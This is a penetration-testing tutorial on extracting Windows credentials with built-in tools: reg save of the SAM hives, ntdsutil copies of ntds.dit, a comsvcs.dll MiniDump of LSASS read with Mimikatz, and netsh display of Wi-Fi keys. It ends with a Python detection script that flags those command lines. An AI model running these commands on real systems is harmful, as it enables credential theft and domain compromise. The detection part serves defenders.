Most penetration testing toolkits offer the ability to extract host credentials. However, being able to carry out this task in environments where code execution may be detected, or is prevented through application whitelisting, is useful.
In this post we’re going to be looking at how to extract some of these credentials using only native Windows tools.
Extracting the SAM database
The Security Account Manager (SAM) database stores user passwords on a system. Given local administrator access to a host, these credentials can be retrieved by taking a backup of a portion of the system's registry:
reg save hklm\sam c:\SAM
reg save hklm\system c:\SYSTEM
reg save hklm\security c:\SECURITY
The files can then be copied to a Linux system and reconstructed using impacket-secretsdump:
impacket-secretsdump -sam /root/SAM -security /root/SECURITY -system /root/SYSTEM LOCAL
Extracting the NTDS database
The New Technology Directory Services (NTDS) database stores passwords for users in an Active Directory domain. The file is typically located at %SystemRoot%\NTDS\Ntds.dit. Since the file is locked whilst the domain controller is powered on, taking a copy of the file requires using volume shadow copies.
The ntdsutil utility can be used to back up the database:
ntdsutil "ac in ntds" i "cr fu c:\temp" q q
Copy these files to a Linux system and extract using secretsdump:
impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL
Extracting Logon Credentials From LSASS
The Local Security Authority Subsystem Service (LSASS) is a process responsible for enforcing security on a Windows system. By creating a memory dump of the process, we can extract plaintext credentials.
With local administrator rights on a host, open Task Manager, find lsass.exe, right click and select “Create Dump File”.
LSASS memory can also be dumped from the command line using the comsvcs DLL:
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Tasks\lsass.dmp full
Mimikatz can then dump the plaintext login credentials:
sekurlsa::Minidump lsass.DMP
sekurlsa::logonPasswords
Extracting Wi-Fi Passwords
Wi-Fi passwords can be extracted from the command line by entering the following:
netsh wlan show profiles
netsh wlan show profile name="ConnectionName" key=clear
The security key will be shown under the Key Content section.
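Because every technique above runs a signed Windows binary, defenders usually catch them from process-creation command lines (for example Security event 4688 with command-line auditing, or Sysmon event ID 1). The following Python is an added example, not part of the original post: the rule names, regular expressions and sample events are constructed for illustration, and it assumes command lines have already been collected as (host, user, command line) tuples.

```python
import re

# Detection rules for the four native-tool techniques described in this post.
# Each pattern is matched case-insensitively against one process command line.
RULES = [
    ("SAM/SYSTEM/SECURITY hive saved with reg.exe",
     r"\breg(\.exe)?\s+save\s+(hklm|hkey_local_machine)\\(sam|system|security)\b"),
    ("ntdsutil IFM copy of ntds.dit",
     r"ntdsutil(\.exe)?\b.*\bcr\w*\s+fu\w*"),
    ("Process memory dump via comsvcs.dll MiniDump",
     r"rundll32(\.exe)?\b.*comsvcs\.dll\W+minidump\b"),
    ("Wi-Fi key shown in clear text via netsh",
     r"netsh(\.exe)?\s+wlan\s+show\s+profiles?\b.*key\s*=\s*clear"),
]
COMPILED = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in RULES]

def classify(command_line):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in COMPILED if rx.search(command_line)]

def scan(events):
    """events: iterable of (host, user, command_line). Returns a list of alerts."""
    alerts = []
    for host, user, cmd in events:
        for name in classify(cmd):
            alerts.append({"host": host, "user": user, "rule": name, "cmd": cmd})
    return alerts

# Constructed sample events (not real telemetry); three are benign look-alikes.
SAMPLE_EVENTS = [
    ("WS01", "admin", r"reg save hklm\sam c:\SAM"),
    ("WS01", "admin", r"reg save hklm\software c:\backup\SOFTWARE"),
    ("DC01", "admin", r'ntdsutil "ac in ntds" i "cr fu c:\temp" q q'),
    ("WS02", "admin", r".\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Tasks\lsass.dmp full"),
    ("WS02", "admin", r"rundll32.exe shell32.dll,Control_RunDLL"),
    ("WS03", "user1", "netsh wlan show profiles"),
    ("WS03", "user1", 'netsh wlan show profile name="ConnectionName" key=clear'),
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f'{a["host"]} {a["user"]}: {a["rule"]} -> {a["cmd"]}')
```

The comsvcs.dll rule cannot tell from the command line alone which process the PID refers to, so correlate it with the PID of lsass.exe on that host before escalating.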